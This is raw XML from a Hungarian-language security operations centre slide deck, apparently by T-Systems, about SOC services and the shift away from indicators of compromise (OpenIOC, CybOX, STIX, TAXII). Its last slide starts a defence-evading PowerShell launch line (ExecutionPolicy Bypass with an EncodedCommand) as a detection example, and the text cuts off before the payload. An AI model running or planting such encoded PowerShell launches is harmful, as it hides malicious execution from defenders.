                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>UDÁS</a:t>
            </a:r>
          </a:p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3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>NFORMÁCIÓ</a:t>
            </a:r>
          </a:p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3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ÉPESSÉG</a:t>
            </a:r>
          </a:p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endParaRPr lang="hu-HU" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p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3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>APASZTALAT </a:t>
            </a:r>
          </a:p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3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>GILITÁS</a:t>
            </a:r>
          </a:p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3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>OORDINÁCIÓ</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" dirty="0" smtClean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818358" y="1791222"/>
            <a:ext cx="7102258" cy="3760622"/>
            <a:chOff x="3870542" y="1791222"/>
            <a:chExt cx="7102258" cy="3760622"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="TextBox 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3870542" y="1791222"/>
              <a:ext cx="7102258" cy="170559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4100"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="450"/>
                </a:spcAft>
                <a:buClr>
                  <a:schemeClr val="tx2"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>TÖBB MINT 60 BIZTONSÁGI SZAKÉRTŐ</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="4100"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="450"/>
                </a:spcAft>
                <a:buClr>
                  <a:schemeClr val="tx2"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>SAJÁT THREAT INTEL (DT, GYÁRTÓK, BELSŐ)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="4100"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="450"/>
                </a:spcAft>
                <a:buClr>
                  <a:schemeClr val="tx2"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>NAPI 20-50 KIVIZSGÁLÁS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3870542" y="3846249"/>
              <a:ext cx="7102258" cy="170559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ts val="4100"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="450"/>
                </a:spcAft>
                <a:buClr>
                  <a:schemeClr val="tx2"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>2000 ÓTA CSINÁLJUK</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="4100"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="450"/>
                </a:spcAft>
                <a:buClr>
                  <a:schemeClr val="tx2"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>7X24 VAGY AMIT AKARTOK</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="4100"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="450"/>
                </a:spcAft>
                <a:buClr>
                  <a:schemeClr val="tx2"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>NAPI 2 MILLIÁRD ESEMÉNY – IR FOLYAMAT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8095050" y="2891560"/>
            <a:ext cx="3102884" cy="1659836"/>
            <a:chOff x="8095050" y="2891560"/>
            <a:chExt cx="3102884" cy="1659836"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="TextBox 5"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8700391" y="2997430"/>
              <a:ext cx="2497543" cy="139371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450"/>
                </a:spcAft>
                <a:buClr>
                  <a:schemeClr val="tx2"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>T-SYSTEMS</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>SOC KÖZPONT</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="450"/>
                </a:spcAft>
                <a:buClr>
                  <a:schemeClr val="tx2"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>SZOLGÁLTATÁS</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Triangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="7429128" y="3557482"/>
              <a:ext cx="1659836" cy="327991"/>
            </a:xfrm>
            <a:prstGeom prst="triangl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59744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5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42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Rectangle 40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344129" y="2504282"/>
            <a:ext cx="10869613" cy="1389062"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hu-HU" altLang="hu-HU" sz="6000" dirty="0" smtClean="0">
                <a:latin typeface="TeleGrotesk Headline Ultra"/>
              </a:rPr>
              <a:t>Köszönöm a  Figyelmet!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="hu-HU" altLang="hu-HU" sz="6000" dirty="0" smtClean="0">
                <a:latin typeface="TeleGrotesk Headline Ultra"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="hu-HU" altLang="hu-HU" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="TeleGrotesk Headline" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Keleti.arthur@t-systems.hu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" sz="4800" dirty="0">
                <a:cs typeface="TeleGrotesk Headline Ultra" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="hu-HU" sz="4800" dirty="0">
                <a:cs typeface="TeleGrotesk Headline Ultra" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="hu-HU" sz="2800" dirty="0">
              <a:latin typeface="Tele-GroteskNor" pitchFamily="2" charset="0"/>
              <a:cs typeface="TeleGrotesk Headline Ultr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9241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5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5" name="Object 29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6" name="Picture 20" hidden="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itel 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359999" y="294041"/>
            <a:ext cx="6186575" cy="1574516"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1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600" kern="1200" dirty="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/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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hu-HU" dirty="0" smtClean="0"/>
              <a:t>PONTOSAN MA 225 ÉVE...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>HASZNÁLTÁK ELSŐ ALKALOMMAL A HÍRHEDT GUILLOTINE-T</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" dirty="0">
              <a:latin typeface="+mn-lt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809"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7712331" y="500821"/>
            <a:ext cx="3525513" cy="533013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2565" y="2477164"/>
            <a:ext cx="2833775" cy="3778367"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Rectangle 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359998" y="2100547"/>
            <a:ext cx="4649323" cy="415498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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>GYORS ÉS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>HALK</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="232627"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p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r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>IJESZTŐ ÉS LÁTVÁNYOS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="232627"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>GAZDASÁGOS</a:t>
            </a:r>
          </a:p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r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALAPOS TERVEZÉS</a:t>
            </a:r>
          </a:p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r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>KEVÉS HIBALEHETŐSÉG</a:t>
            </a:r>
          </a:p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r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>GARANTÁLT MŰKÖDÉS</a:t>
            </a:r>
          </a:p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r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALACSONY “TCO”</a:t>
            </a:r>
          </a:p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r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ÉPPEN OLYAN, MINT EGY 2017-ES PROFI MALWARE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p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endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="232627"/>
              </a:solidFill>
              <a:latin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743097" y="5830956"/>
            <a:ext cx="1606017" cy="2585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err="1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Forrás</a:t>
            </a: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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1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boisdejustice.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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5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584119">
            <a:off x="6519913" y="2477195"/>
            <a:ext cx="6135613" cy="251139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5125" name="Object 29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6" name="Picture 20" hidden="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itel 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359999" y="294041"/>
            <a:ext cx="10771827" cy="588082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1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600" kern="1200" dirty="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/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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hu-HU" dirty="0" smtClean="0"/>
              <a:t>AZ „IOC” HALOTT...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>NA VÁRJUNK CSAK, MI IS AZ AZ „IOC”?</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" dirty="0">
              <a:latin typeface="+mn-lt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359999" y="1860517"/>
            <a:ext cx="6189391" cy="4487382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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>IOC = INDICATORS OF COMPROMISE</a:t>
            </a:r>
          </a:p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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>„KIFEJEZÉS” KORAI NYOMAI (AD 2000)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>EMLÉKSZÜNK AZ RSA BREACH-RE (2011)?</a:t>
            </a:r>
          </a:p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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>OpenIOC</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="232627"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p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err="1">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>CybOX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Cyber Observable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>eXpression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="232627"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>STIX 2.0: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Structured Threat Information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Expression</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="232627"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>TAXII: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Trusted Automated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>eXchange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> of Indicator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Information</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="232627"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ÉS MÉG AZ A SOK GYÁRTÓI ÖTLET...</a:t>
            </a:r>
          </a:p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endParaRPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="232627"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p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endParaRPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="232627"/>
              </a:solidFill>
              <a:latin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27860" y="4903052"/>
            <a:ext cx="3272832" cy="558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1435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5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5" name="Object 29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6" name="Picture 20" hidden="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itel 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359999" y="294041"/>
            <a:ext cx="10771827" cy="588082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1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600" kern="1200" dirty="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/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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hu-HU" dirty="0" smtClean="0"/>
              <a:t>AZ „IOC” HALOTT...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MIBŐL LESZ A CSERE-IOC?</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" dirty="0">
              <a:latin typeface="+mn-lt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59998" y="1445080"/>
            <a:ext cx="10771827" cy="4640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dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>powershell.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>NonInteractive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ExecutionPolicy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> Bypass -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>EncodedCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
